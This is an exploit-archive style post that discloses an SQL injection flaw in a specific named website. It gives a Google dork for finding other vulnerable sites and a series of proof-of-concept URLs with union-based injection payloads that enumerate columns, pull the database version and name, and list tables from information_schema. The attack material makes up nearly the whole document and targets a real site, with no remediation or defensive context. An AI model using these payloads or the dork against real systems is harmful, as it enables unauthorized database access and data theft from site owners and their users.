######################################
#Exploit Title: sardasht-aj.ir sql Vulnerability
######################################
# Vendor site: sardasht-aj.ir
#
#Google Dork: inurl:show.php?id= site:.ir
##################################################################
# Demo:
# http://sardasht-aj.ir/show.php?id=180
#########################################################
# poc
# http://sardasht-aj.ir/show.php?id=180%27+order+by+8--+
# http://sardasht-aj.ir/show.php?id=180%27+union+select+1,2,3,4,5,6,7,8--+
#
# http://sardasht-aj.ir/show.php?id=180%27+union+select+1,Version(),3,4,5,6,7,8--+
# http://sardasht-aj.ir/show.php?id=180%27+union+select+1,Database(),3,4,5,6,7,8--+
#
# group_concat(table_name).....+from+information_schema.tables+where+table_schema=database()--+
#####################################################################
# Exploit Author: mr_abolfazl
# Tested on: Win 10
#Telegram ID : shad0w_man
######################################################################